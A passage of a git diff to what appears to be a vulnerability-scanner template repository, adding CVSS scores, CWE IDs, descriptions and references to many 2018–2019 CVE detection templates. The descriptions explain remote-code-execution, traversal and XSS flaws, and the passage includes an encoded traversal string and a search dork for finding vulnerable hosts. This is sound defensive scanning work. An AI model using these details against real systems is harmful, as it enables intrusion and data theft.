cve,cve2018,oracle,weblogic,network + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-2628 + cwe-id: CWE-502 + description: "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)." network: - inputs: diff --git a/cves/2018/CVE-2018-2791.yaml b/cves/2018/CVE-2018-2791.yaml index ab909a6e61..5dd0c7f892 100644 --- a/cves/2018/CVE-2018-2791.yaml +++ b/cves/2018/CVE-2018-2791.yaml @@ -3,9 +3,18 @@ id: CVE-2018-2791 info: name: Oracle WebCenter Sites XSS author: madrobot - severity: medium + severity: high description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware tags: cve,cve2018,oracle,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N + cvss-score: 8.20 + cve-id: CVE-2018-2791 + reference: + - http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html + - http://www.securitytracker.com/id/1040695 + - http://www.securityfocus.com/bid/103800 + - https://www.exploit-db.com/exploits/44752/ requests: - method: GET diff --git a/cves/2018/CVE-2018-2893.yaml b/cves/2018/CVE-2018-2893.yaml index 4fc9fa8c42..f87d6e3fa4 100644 --- a/cves/2018/CVE-2018-2893.yaml +++ b/cves/2018/CVE-2018-2893.yaml @@ -3,9 +3,14 @@ id: CVE-2018-2893 info: name: Oracle WebLogic Server Deserialization RCE (CVE-2018-2893) author: milo2012 - severity: high + severity: critical tags: cve,cve2018,weblogic,network reference: https://www.anquanke.com/post/id/152164, https://vulners.com/nessus/WEBLOGIC_CVE_2018_2893.NASL + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-2893 + description: "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)." network: - inputs: diff --git a/cves/2018/CVE-2018-2894.yaml b/cves/2018/CVE-2018-2894.yaml index 7b96e235fa..a192dae23d 100644 --- a/cves/2018/CVE-2018-2894.yaml +++ b/cves/2018/CVE-2018-2894.yaml @@ -7,6 +7,10 @@ info: reference: https://blog.detectify.com/2018/11/14/technical-explanation-of-cve-2018-2894-oracle-weblogic-rce/ severity: critical tags: cve,cve2018,oracle,weblogic,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-2894 requests: - method: GET diff --git a/cves/2018/CVE-2018-3167.yaml b/cves/2018/CVE-2018-3167.yaml index a69023eef5..45ba1789ea 100644 --- a/cves/2018/CVE-2018-3167.yaml +++ b/cves/2018/CVE-2018-3167.yaml @@ -3,9 +3,17 @@ id: CVE-2018-3167 info: name: Unauthenticated Blind SSRF in Oracle EBS author: geeknik - severity: low + severity: medium description: https://medium.com/@x41x41x41/unauthenticated-ssrf-in-oracle-ebs-765bd789a145 tags: cve,cve2018,oracle,ebs,ssrf + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2018-3167 + reference: + - http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html + - http://www.securitytracker.com/id/1041897 + - http://www.securityfocus.com/bid/105627 requests: - method: POST diff --git a/cves/2018/CVE-2018-3714.yaml b/cves/2018/CVE-2018-3714.yaml index 27ef1d003f..e44ca7a0b5 100644 --- a/cves/2018/CVE-2018-3714.yaml +++ b/cves/2018/CVE-2018-3714.yaml @@ -2,9 +2,15 @@ id: CVE-2018-3714 info: name: node-srv Path Traversal author: madrobot - severity: high + severity: medium reference: https://hackerone.com/reports/309124 tags: cve,cve2018,nodejs,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2018-3714 + cwe-id: CWE-22 + description: "node-srv node module suffers from a Path Traversal vulnerability due to lack of validation of url, which allows a malicious user to read content of any file with known path." requests: - method: GET diff --git a/cves/2018/CVE-2018-3760.yaml b/cves/2018/CVE-2018-3760.yaml index 49b4dc9d42..221891cb15 100644 --- a/cves/2018/CVE-2018-3760.yaml +++ b/cves/2018/CVE-2018-3760.yaml @@ -13,6 +13,11 @@ info: Ruby On Rails is a well-known Ruby Web development framework, which uses Sprockets as a static file server in development environment. Sprockets is a Ruby library that compiles and distributes static resource files. There is a path traversal vulnerability caused by secondary decoding in Sprockets 3.7.1 and lower versions. An attacker can use %252e%252e/ to access the root directory and read or execute any file on the target server. tags: cve,cve2018,rails,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-3760 + cwe-id: CWE-200 requests: - raw: diff --git a/cves/2018/CVE-2018-3810.yaml b/cves/2018/CVE-2018-3810.yaml index 84323e0f2a..d7c71edf22 100644 --- a/cves/2018/CVE-2018-3810.yaml +++ b/cves/2018/CVE-2018-3810.yaml @@ -6,6 +6,12 @@ info: severity: critical reference: https://www.exploit-db.com/exploits/43420 tags: wordpress,cve,cve2018 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-3810 + cwe-id: CWE-287 + description: "Authentication Bypass vulnerability in the Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to insert arbitrary JavaScript or HTML code (via the sgcgoogleanalytic parameter) that runs on all pages served by WordPress. The saveGoogleCode() function in smartgooglecode.php does not check if the current request is made by an authorized user, thus allowing any unauthenticated user to successfully update the inserted code." requests: - method: POST diff --git a/cves/2018/CVE-2018-5230.yaml b/cves/2018/CVE-2018-5230.yaml index 4a1d51ccd1..3073e580b5 100644 --- a/cves/2018/CVE-2018-5230.yaml +++ b/cves/2018/CVE-2018-5230.yaml @@ -5,6 +5,14 @@ info: author: madrobot severity: medium tags: cve,cve2018,atlassian,confluence,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-5230 + cwe-id: CWE-79 + description: "The issue collector in Atlassian Jira before version 7.6.6, from version 7.7.0 before version 7.7.4, from version 7.8.0 before version 7.8.4 and from version 7.9.0 before version 7.9.2 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the error message of custom fields when an invalid value is specified." + reference: + - https://jira.atlassian.com/browse/JRASERVER-67289 requests: - method: GET diff --git a/cves/2018/CVE-2018-5233.yaml b/cves/2018/CVE-2018-5233.yaml index 6dd9374e44..611c7a3a1e 100644 --- a/cves/2018/CVE-2018-5233.yaml +++ b/cves/2018/CVE-2018-5233.yaml @@ -8,6 +8,11 @@ info: Cross-site scripting (XSS) vulnerability in system/src/Grav/Common/Twig/Twig.php in Grav CMS before 1.3.0 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to admin/tools. reference: https://nvd.nist.gov/vuln/detail/CVE-2018-5233 tags: cve,cve2018,xss,grav + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-5233 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2018/CVE-2018-5316.yaml b/cves/2018/CVE-2018-5316.yaml index 13f88cb96b..f2a21c4a73 100644 --- a/cves/2018/CVE-2018-5316.yaml +++ b/cves/2018/CVE-2018-5316.yaml @@ -7,6 +7,11 @@ info: description: The SagePay Server Gateway for WooCommerce plugin before 1.0.9 for WordPress has XSS via the includes/pages/redirect.php page parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2018-5316 tags: cve,cve2018,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-5316 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2018/CVE-2018-6008.yaml b/cves/2018/CVE-2018-6008.yaml index 65848e8da0..fc531f1cd6 100644 --- a/cves/2018/CVE-2018-6008.yaml +++ b/cves/2018/CVE-2018-6008.yaml @@ -9,6 +9,11 @@ info: - https://www.exploit-db.com/exploits/43913 - https://www.cvedetails.com/cve/CVE-2018-6008 tags: cve,cve2018,joomla,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-6008 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2018/CVE-2018-6910.yaml b/cves/2018/CVE-2018-6910.yaml index 03cc1ee5c9..dede5965e4 100644 --- a/cves/2018/CVE-2018-6910.yaml +++ b/cves/2018/CVE-2018-6910.yaml @@ -7,6 +7,11 @@ info: reference: https://nvd.nist.gov/vuln/detail/CVE-2018-6910 description: DedeCMS 5.7 allows remote attackers to discover the full path via a direct request for include/downmix.inc.php or inc/inc_archives_functions.php tags: cve,cve2018,dedecms + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2018-6910 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2018/CVE-2018-7251.yaml b/cves/2018/CVE-2018-7251.yaml index f9994ccfb5..d89c8df6dd 100644 --- a/cves/2018/CVE-2018-7251.yaml +++ b/cves/2018/CVE-2018-7251.yaml @@ -3,8 +3,20 @@ id: CVE-2018-7251 info: name: AnchorCMS Error Log Exposure author: pdteam - severity: medium + severity: critical tags: cve,cve2018,anchorcms,logs + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-7251 + cwe-id: CWE-200 + description: "An issue was discovered in config/error.php in Anchor 0.12.3. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as \"Too many connections\") has occurred." + reference: + - https://github.com/anchorcms/anchor-cms/issues/1247 + - http://www.andmp.com/2018/02/advisory-assigned-CVE-2018-7251-in-anchorcms.html + - https://twitter.com/finnwea/status/965279233030393856 + - http://packetstormsecurity.com/files/154723/Anchor-CMS-0.12.3a-Information-Disclosure.html + - https://github.com/anchorcms/anchor-cms/releases/tag/0.12.7 requests: - method: GET diff --git a/cves/2018/CVE-2018-7422.yaml b/cves/2018/CVE-2018-7422.yaml index 8cb678bdfd..d05e72261a 100644 --- a/cves/2018/CVE-2018-7422.yaml +++ b/cves/2018/CVE-2018-7422.yaml @@ -7,6 +7,11 @@ info: tags: cve,cve2018,wordpress,wp-plugin,lfi description: A Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1 for WordPress allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php. reference: https://www.exploit-db.com/exploits/44340 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-7422 + cwe-id: CWE-22,CWE-829 requests: - method: GET diff --git a/cves/2018/CVE-2018-7490.yaml b/cves/2018/CVE-2018-7490.yaml index a2cb244508..1e3744b1e1 100644 --- a/cves/2018/CVE-2018-7490.yaml +++ b/cves/2018/CVE-2018-7490.yaml @@ -5,6 +5,16 @@ info: author: madrobot severity: high tags: cve,cve2018,uwsgi,php,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-7490 + cwe-id: CWE-22 + description: "uWSGI before 2.0.17 mishandles a DOCUMENT_ROOT check during use of the --php-docroot option, allowing directory traversal." + reference: + - https://uwsgi-docs.readthedocs.io/en/latest/Changelog-2.0.17.html + - https://www.exploit-db.com/exploits/44223/ + - https://www.debian.org/security/2018/dsa-4142 requests: - method: GET diff --git a/cves/2018/CVE-2018-7600.yaml b/cves/2018/CVE-2018-7600.yaml index 9aff058ee4..13c2a5fc08 100644 --- a/cves/2018/CVE-2018-7600.yaml +++ b/cves/2018/CVE-2018-7600.yaml @@ -6,6 +6,12 @@ info: severity: critical reference: https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2018-7600 tags: cve,cve2018,drupal,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-7600 + cwe-id: CWE-20 + description: "Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations." requests: - raw: diff --git a/cves/2018/CVE-2018-7700.yaml b/cves/2018/CVE-2018-7700.yaml index de3d622d4c..32b525bf7f 100644 --- a/cves/2018/CVE-2018-7700.yaml +++ b/cves/2018/CVE-2018-7700.yaml @@ -6,6 +6,12 @@ info: severity: high reference: https://laworigin.github.io/2018/03/07/CVE-2018-7700-dedecms%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/ tags: cve,cve2018,dedecms,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2018-7700 + cwe-id: CWE-352 + description: "DedeCMS 5.7 has CSRF with an impact of arbitrary code execution, because the partcode parameter in a tag_test_action.php request can specify a runphp field in conjunction with PHP code." requests: - method: GET diff --git a/cves/2018/CVE-2018-8006.yaml b/cves/2018/CVE-2018-8006.yaml index e49839a2e0..4c909a65b6 100644 --- a/cves/2018/CVE-2018-8006.yaml +++ b/cves/2018/CVE-2018-8006.yaml @@ -5,6 +5,23 @@ info: author: pdteam severity: medium tags: cve,cve2018,apache,activemq,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-8006 + cwe-id: CWE-79 + description: "An instance of a cross-site scripting vulnerability was identified to be present in the web based administration console on the queue.jsp page of Apache ActiveMQ versions 5.0.0 to 5.15.5. The root cause of this issue is improper data filtering of the QueueFilter parameter." + reference: + - http://activemq.apache.org/security-advisories.data/CVE-2018-8006-announcement.txt + - http://www.securityfocus.com/bid/105156 + - https://lists.apache.org/thread.html/2b5c0039197a4949f29e1e2c9441ab38d242946b966f61c110808bcc@%3Ccommits.activemq.apache.org%3E + - https://lists.apache.org/thread.html/fcbe6ad00f1de142148c20d813fae3765dc4274955e3e2f3ca19ff7b@%3Cdev.activemq.apache.org%3E + - https://lists.apache.org/thread.html/a859563f05fbe7c31916b3178c2697165bd9bbf5a65d1cf62aef27d2@%3Ccommits.activemq.apache.org%3E + - https://lists.apache.org/thread.html/03f91b1fb85686a848cee6b90112cf6059bd1b21b23bacaa11a962e1@%3Cdev.activemq.apache.org%3E + - https://lists.apache.org/thread.html/3f1e41bc9153936e065ca3094bd89ff8167ad2d39ac0b410f24382d2@%3Cgitbox.activemq.apache.org%3E + - https://lists.apache.org/thread.html/c0ec53b72b3240b187afb1cf67e4309a9e5f607282010aa196734814@%3Cgitbox.activemq.apache.org%3E + - https://lists.apache.org/thread.html/rb698ed085f79e56146ca24ab359c9ef95846618675ea1ef402e04a6d@%3Ccommits.activemq.apache.org%3E + - https://lists.apache.org/thread.html/r946488fb942fd35c6a6e0359f52504a558ed438574a8f14d36d7dcd7@%3Ccommits.activemq.apache.org%3E requests: - method: GET diff --git a/cves/2018/CVE-2018-8033.yaml b/cves/2018/CVE-2018-8033.yaml index 8904dd11ea..55f1fd7a8c 100644 --- a/cves/2018/CVE-2018-8033.yaml +++ b/cves/2018/CVE-2018-8033.yaml @@ -6,6 +6,13 @@ info: severity: high description: XXE injection (file disclosure) exploit for Apache OFBiz 16.11.04 tags: cve,cve2018,apache,ofbiz,xxe + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-8033 + cwe-id: CWE-200 + reference: + - https://lists.apache.org/thread.html/e8fb551e86e901932081f81ee9985bb72052b4d412f23d89b1282777@%3Cuser.ofbiz.apache.org%3E requests: - raw: diff --git a/cves/2018/CVE-2018-8715.yaml b/cves/2018/CVE-2018-8715.yaml index 7341f180dd..01005c6032 100644 --- a/cves/2018/CVE-2018-8715.yaml +++ b/cves/2018/CVE-2018-8715.yaml @@ -8,6 +8,11 @@ info: tags: cve,cve2018,appweb,auth-bypass reference: - https://github.com/embedthis/appweb/issues/610 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2018-8715 + cwe-id: CWE-287 requests: - raw: diff --git a/cves/2018/CVE-2018-8719.yaml b/cves/2018/CVE-2018-8719.yaml index ccef2695c1..022985a814 100644 --- a/cves/2018/CVE-2018-8719.yaml +++ b/cves/2018/CVE-2018-8719.yaml @@ -10,6 +10,11 @@ info: - https://vuldb.com/?id.115817 - https://www.cvedetails.com/cve/CVE-2018-8719/ tags: wordpress,wp-plugin,cve,cve2018,exposure + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2018-8719 + cwe-id: CWE-532 requests: - method: GET diff --git a/cves/2018/CVE-2018-8770.yaml b/cves/2018/CVE-2018-8770.yaml index 442020990c..1f57cd812d 100644 --- a/cves/2018/CVE-2018-8770.yaml +++ b/cves/2018/CVE-2018-8770.yaml @@ -8,6 +8,11 @@ info: - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8770 - https://www.exploit-db.com/exploits/44495/ tags: cve,cve2018,cobub,razor,exposure + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2018-8770 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2018/CVE-2018-9118.yaml b/cves/2018/CVE-2018-9118.yaml index 13722267ef..3440542393 100644 --- a/cves/2018/CVE-2018-9118.yaml +++ b/cves/2018/CVE-2018-9118.yaml @@ -7,6 +7,11 @@ info: description: Affected by this vulnerability is an unknown functionality of the file exports/download.php. The manipulation of the argument filename with the input value leads to a directory traversal vulnerability reference: https://www.exploit-db.com/exploits/44417 tags: wordpress,wp-plugin,lfi,cve,cve2018 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-9118 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2018/CVE-2018-9995.yaml b/cves/2018/CVE-2018-9995.yaml index d97e5a8118..49ed20338b 100644 --- a/cves/2018/CVE-2018-9995.yaml +++ b/cves/2018/CVE-2018-9995.yaml @@ -2,7 +2,7 @@ id: CVE-2018-9995 info: name: DVR Authentication Bypass author: princechaddha - severity: high + severity: critical description: | TBK DVR4104 and DVR4216 devices, as well as Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, DVR Login, HVR Login, and MDVR Login, which run re-branded versions of the original TBK DVR4104 and DVR4216 series, allow remote attackers to bypass @@ -14,6 +14,10 @@ info: - https://www.bleepingcomputer.com/news/security/new-hacking-tool-lets-users-access-a-bunch-of-dvrs-and-their-video-feeds/ - https://www.exploit-db.com/exploits/44577/ tags: cve,cve2018,auth-bypass + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-9995 requests: - method: GET diff --git a/cves/2019/CVE-2019-0193.yaml b/cves/2019/CVE-2019-0193.yaml index ff40e30a68..84af6836bc 100644 --- a/cves/2019/CVE-2019-0193.yaml +++ b/cves/2019/CVE-2019-0193.yaml @@ -4,12 +4,17 @@ info: name: Apache Solr - DataImportHandler RCE description: In Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true. author: pdteam - severity: critical + severity: high reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-0193 - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193 - https://paper.seebug.org/1009/ tags: cve,cve2019,apache,rce,solr,oob + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.20 + cve-id: CVE-2019-0193 + cwe-id: CWE-94 requests: - raw: diff --git a/cves/2019/CVE-2019-0221.yaml b/cves/2019/CVE-2019-0221.yaml index 8527f6724d..5369a5b00a 100644 --- a/cves/2019/CVE-2019-0221.yaml +++ b/cves/2019/CVE-2019-0221.yaml @@ -3,7 +3,7 @@ id: CVE-2019-0221 info: name: Apache Tomcat XSS author: pikpikcu - severity: low + severity: medium reference: - https://seclists.org/fulldisclosure/2019/May/50 - https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/ @@ -14,6 +14,11 @@ info: therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website. tags: cve,cve2019,apache,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-0221 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2019/CVE-2019-0230.yaml b/cves/2019/CVE-2019-0230.yaml index 0c52c1b430..afe490d14c 100644 --- a/cves/2019/CVE-2019-0230.yaml +++ b/cves/2019/CVE-2019-0230.yaml @@ -7,8 +7,13 @@ info: reference: - https://cwiki.apache.org/confluence/display/WW/S2-059 - https://www.tenable.com/blog/cve-2019-0230-apache-struts-potential-remote-code-execution-vulnerability - severity: high + severity: critical tags: struts,rce,cve,cve2019 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-0230 + cwe-id: CWE-915 requests: - method: GET diff --git a/cves/2019/CVE-2019-10068.yaml b/cves/2019/CVE-2019-10068.yaml index 939dbedfd4..f3c238c10a 100644 --- a/cves/2019/CVE-2019-10068.yaml +++ b/cves/2019/CVE-2019-10068.yaml @@ -12,6 +12,11 @@ info: - https://packetstormsecurity.com/files/157588/Kentico-CMS-12.0.14-Remote-Command-Execution.html - https://nvd.nist.gov/vuln/detail/CVE-2019-10068 - https://github.com/rapid7/metasploit-framework/pull/13107 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-10068 + cwe-id: CWE-502 requests: - method: POST diff --git a/cves/2019/CVE-2019-10092.yaml b/cves/2019/CVE-2019-10092.yaml index 4df9c87c68..8a546703a7 100644 --- a/cves/2019/CVE-2019-10092.yaml +++ b/cves/2019/CVE-2019-10092.yaml @@ -9,6 +9,11 @@ info: - https://github.com/DrunkenShells/Disclosures/tree/master/CVE-2019-10092-Limited%20Cross-Site%20Scripting%20in%20mod_proxy%20Error%20Page-Apache%20httpd - https://httpd.apache.org/security/vulnerabilities_24.html tags: cve,cve2019,apache,htmli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-10092 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2019/CVE-2019-1010287.yaml b/cves/2019/CVE-2019-1010287.yaml index cb37d90548..93c87f6f1b 100644 --- a/cves/2019/CVE-2019-1010287.yaml +++ b/cves/2019/CVE-2019-1010287.yaml @@ -3,13 +3,19 @@ id: CVE-2019-1010287 info: name: Timesheet 1.5.3 - Cross Site Scripting author: pikpikcu - severity: high + severity: medium reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-1010287 - http://www.mdh-tz.info/ # demo tags: cve,cve2019,timesheet,xss additional-fields: google-dork: inurl:"/timesheet/login.php" + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-1010287 + cwe-id: CWE-79 + description: "Timesheet Next Gen 1.5.3 and earlier is affected by: Cross Site Scripting (XSS). The impact is: Allows an attacker to execute arbitrary HTML and JavaScript code via a \"redirect\" parameter. The component is: Web login form: login.php, lines 40 and 54. The attack vector is: reflected XSS, victim may click the malicious url." requests: - raw: # Metod POST From login.php diff --git a/cves/2019/CVE-2019-10475.yaml b/cves/2019/CVE-2019-10475.yaml index ed170a3bfe..bd50686df4 100644 --- a/cves/2019/CVE-2019-10475.yaml +++ b/cves/2019/CVE-2019-10475.yaml @@ -5,6 +5,16 @@ info: author: madrobot severity: medium tags: cve,cve2019,jenkins,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-10475 + cwe-id: CWE-79 + description: "A reflected cross-site scripting vulnerability in Jenkins build-metrics Plugin allows attackers to inject arbitrary HTML and JavaScript into web pages provided by this plugin." + reference: + - https://jenkins.io/security/advisory/2019-10-23/#SECURITY-1490 + - http://www.openwall.com/lists/oss-security/2019/10/23/2 + - http://packetstormsecurity.com/files/155200/Jenkins-Build-Metrics-1.3-Cross-Site-Scripting.html requests: - method: GET diff --git a/cves/2019/CVE-2019-11013.yaml b/cves/2019/CVE-2019-11013.yaml index afd00e4a16..d5cbcb989d 100644 --- a/cves/2019/CVE-2019-11013.yaml +++ b/cves/2019/CVE-2019-11013.yaml @@ -3,11 +3,17 @@ id: CVE-2019-11013 info: name: Nimble Streamer 3.0.2-2 to 3.5.4-9 - Path Traversal author: 0x_Akoko - severity: high + severity: medium reference: - https://www.exploit-db.com/exploits/47301 - https://nvd.nist.gov/vuln/detail/CVE-2019-11013 tags: cve,cve2019,lfi,nimble + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2019-11013 + cwe-id: CWE-22 + description: "Nimble Streamer 3.0.2-2 through 3.5.4-9 has a ../ directory traversal vulnerability. Successful exploitation could allow an attacker to traverse the file system to access files or directories that are outside of the restricted directory on the remote server." requests: - method: GET diff --git a/cves/2019/CVE-2019-11248.yaml b/cves/2019/CVE-2019-11248.yaml index 4f65493181..7d3e107c36 100644 --- a/cves/2019/CVE-2019-11248.yaml +++ b/cves/2019/CVE-2019-11248.yaml @@ -3,12 +3,17 @@ id: CVE-2019-11248 info: name: exposed_pprof author: 0xceeb - severity: medium + severity: high tags: cve,cve2019,debug description: The debugging endpoint /debug/pprof is exposed over the unauthenticated Kubelet healthz port. The go pprof endpoint is exposed over the Kubelet's healthz port. This debugging endpoint can potentially leak sensitive information such as internal Kubelet memory addresses and configuration, or for limited denial of service. Versions prior to 1.15.0, 1.14.4, 1.13.8, and 1.12.10 are affected. The issue is of medium severity, but not exposed by the default configuration. reference: - https://medium.com/bugbountywriteup/my-first-bug-bounty-21d3203ffdb0 - http://mmcloughlin.com/posts/your-pprof-is-showing + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L + cvss-score: 8.20 + cve-id: CVE-2019-11248 + cwe-id: CWE-862 requests: - method: GET diff --git a/cves/2019/CVE-2019-11510.yaml b/cves/2019/CVE-2019-11510.yaml index 7effbabf9b..5be81356d6 100644 --- a/cves/2019/CVE-2019-11510.yaml +++ b/cves/2019/CVE-2019-11510.yaml @@ -3,9 +3,15 @@ id: CVE-2019-11510 info: name: Pulse Connect Secure SSL VPN arbitrary file read vulnerability author: organiccrap - severity: high + severity: critical reference: https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html tags: cve,cve2019,pulsesecure,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2019-11510 + cwe-id: CWE-22 + description: "In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 